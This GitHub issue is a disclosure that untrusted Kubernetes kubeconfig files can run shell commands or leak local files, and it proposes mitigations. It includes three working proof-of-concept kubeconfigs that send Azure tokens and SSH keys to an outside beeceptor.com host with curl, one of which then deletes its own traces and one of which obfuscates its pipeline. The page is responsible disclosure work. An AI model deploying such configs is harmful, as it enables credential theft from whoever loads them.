Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Unexpected consequences of using untrusted kubeconfig files #697

Closed
orymate opened this issue Aug 10, 2019 · 8 comments
Closed

Unexpected consequences of using untrusted kubeconfig files #697

orymate opened this issue Aug 10, 2019 · 8 comments
Labels
lifecycle/rotten Denotes an issue or PR that has aged beyond stale and will be auto-closed.

Comments

@orymate
Copy link

orymate commented Aug 10, 2019

We reached out the Kubernetes security team with the following report, and the only response within a week was from Brandon Philips, an advice to open a public issue here.

We recently realized an issue about the security of Kubeconfig files, especially when used for the exchange of credentials and for accessing Kubernetes API servers. It is common practice to make Kubeconfig files available for download.

The issue is that most users are not aware that Kubeconfig files can lead to the execution of malicious shell commands or to the exposure of arbitrary files. Of course security-aware interactive users, or the developers of automated systems take care of inspecting the contents of the Kubeconfig file before use, but it is not something that you trivially identify as a vulnerable interface.

There are two broad set of issues:

  • A Kubeconfig file exposes users (Kubernetes administrators, developers) to the risk of their local systems being compromised.
  • Automated systems like public CI/CDs or other similar services (dashboards, service meshes, etc.) may get compromised through the sdk client executing insecure operations.

The first one affects kubectl users primarily, but we haven’t found any public discussions about this topic so far, neither a single warning in the documentation.

Our suggestion would be to start a discussion now and to consider some of the following solutions. Some of these are specific to kubectl, while others could be implemented in the Go client:

  • Build a user- or system global configurable list of commands that are supported for exec()-ing from Kubernetes just like the /etc/shells of Unix systems. Installed packages, like the gcloud tool, could add themselves to the list.
  • Require all the commands exec()-ed from Kubernetes to be in ~/.kube/bin or another folder used for this single purpose, require commands to be basenames (no slashes), and use this folder as the only item of PATH. Administrators or package installers may create the needed symlinks.
  • Add a kubectl command-line flag and sdk client config parameter for allowing reading files outside the folder of the kubeconfig, or ~/.kube, or some other well-defined scope (InClusterConfig could set it as well).
  • Add an option to the sdk client to replace the Exec interface used for these functions, for example to restrict the environment variables to share, or implement a restricted environment to run these commands inside, for example to run them in separate K8s Tasks.
    Create a “base” kubeconfig that is not replaced easily, and unlike the normal kubeconfig, can set sensitive values like the list of allowed commands. This might be controlled by a new env var and a default value.
  • Implement a better API server access/credentials interchange format, that could be used in a way that is independent from kubeconfig. This could contain a single cluster and user definition, and may reside in a place like ~/.kube/cluster.d or context.d. This might make it possible to keep the above-mentioned sensitive flags in the kubeconfig, which is not supposed to be replaced with another configuration as an everyday practice.

Find below a few examples for illustration of the problem (use env KUBECONFIG=file kubectl version to try them):

  • Leak Azure tokens on the machine
  • Leak SSH private keys and remove traces
  • Leak ~/.ssh (private keys and known hosts) -- different method
==> dataleak-poc/file <==
# send any shorter single-line file readable by the user to an arbitrary address as a http header
# as an example, Azure credentials are in a single-line json, and can be easily leaked unless there are too many expired tokens
# in a kubernetes pod accepting kubeconfigs from users, this might be a mounted secret too

apiVersion: v1
kind: Config
clusters:
- cluster:
    server: 'https://eipu5nae.free.beeceptor.com'
  name: poc
contexts:
- context:
    cluster: poc
    user: poc
  name: poc
current-context: poc
users:
- name: poc
  user:
    tokenFile: ../.azure/accessTokens.json.dontdoit  # assume that this kubeconfig file is in ~/Downloads (and is not too long...)


==> exec-poc/file <==
# execute arbitrary commands with the exec authenticator
# in the example, leak the ssh keys (.pub is optional) and remove the traces
apiVersion: v1
clusters:
- cluster:
    server: https://eipu5nae.free.beeceptor.com/
  name: poc
contexts:
- context:
    cluster: poc
    user: poc
  name: poc
current-context: poc
kind: Config
preferences: {}
users:
- name: poc
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1alpha1
      command: sh
      args:
      - -c
      - "curl -d@../.ssh/id_rsa.pub https://eipu5nae.free.beeceptor.com/exec; sed -i -e '/exec:/,$ d' \"$KUBECONFIG\" || true"


==> gcp-auth-exec-poc/file <==
# execute arbitrary commands with the gcp auth provider
# in the example, leak the ssh keys
apiVersion: v1
clusters:
- cluster:
    server: https://eipu5nae.free.beeceptor.com/
  name: poc
contexts:
- context:
    cluster: poc
    user: poc
  name: poc
current-context: poc
kind: Config
preferences: {}
users:
- name: poc
  user:
    auth-provider:
      config:
        cmd-args: -c IFS=_;cmd="eval_tar_c_$HOME/.ssh.dontdoit|base64|curl_-d@-_https://eipu5nae.free.beeceptor.com";$cmd
        cmd-path: /bin/sh
      name: gcp
@fejta-bot
Copy link

Issues go stale after 90d of inactivity.
Mark the issue as fresh with /remove-lifecycle stale.
Stale issues rot after an additional 30d of inactivity and eventually close.

If this issue is safe to close now please do so with /close.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/lifecycle stale

@k8s-ci-robot k8s-ci-robot added the lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. label Nov 10, 2019
@fejta-bot
Copy link

Stale issues rot after 30d of inactivity.
Mark the issue as fresh with /remove-lifecycle rotten.
Rotten issues close after an additional 30d of inactivity.

If this issue is safe to close now please do so with /close.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/lifecycle rotten

@k8s-ci-robot k8s-ci-robot added lifecycle/rotten Denotes an issue or PR that has aged beyond stale and will be auto-closed. and removed lifecycle/stale Denotes an issue or PR has remained open with no activity and has become stale. labels Dec 10, 2019
@fejta-bot
Copy link

Rotten issues close after 30d of inactivity.
Reopen the issue with /reopen.
Mark the issue as fresh with /remove-lifecycle rotten.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/close

@k8s-ci-robot
Copy link
Contributor

@fejta-bot: Closing this issue.

In response to this:

Rotten issues close after 30d of inactivity.
Reopen the issue with /reopen.
Mark the issue as fresh with /remove-lifecycle rotten.

Send feedback to sig-testing, kubernetes/test-infra and/or fejta.
/close

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@techdragon
Copy link

/reopen

@k8s-ci-robot
Copy link
Contributor

@techdragon: You can't reopen an issue/PR unless you authored it or you are a collaborator.

In response to this:

/reopen

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes/test-infra repository.

@neolit123
Copy link
Member

neolit123 commented May 5, 2020

once a kubeconfig is downloaded from the internet it's responsibility of the administrator to verify the validity of the kubeconfig before using the kubeconfig.

similar goes for bash scripts:

curl -sfL https://somewebsite.com | sh -

^ this is a bad practice.

@morremeyer
Copy link

morremeyer commented Mar 4, 2021

@neolit123 Bad practice or not: if we can prevent people from footgunning themselves, we should consider doing so.

@orymate could you reopen the issue, please?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
lifecycle/rotten Denotes an issue or PR that has aged beyond stale and will be auto-closed.
Projects
None yet
Development

No branches or pull requests

6 participants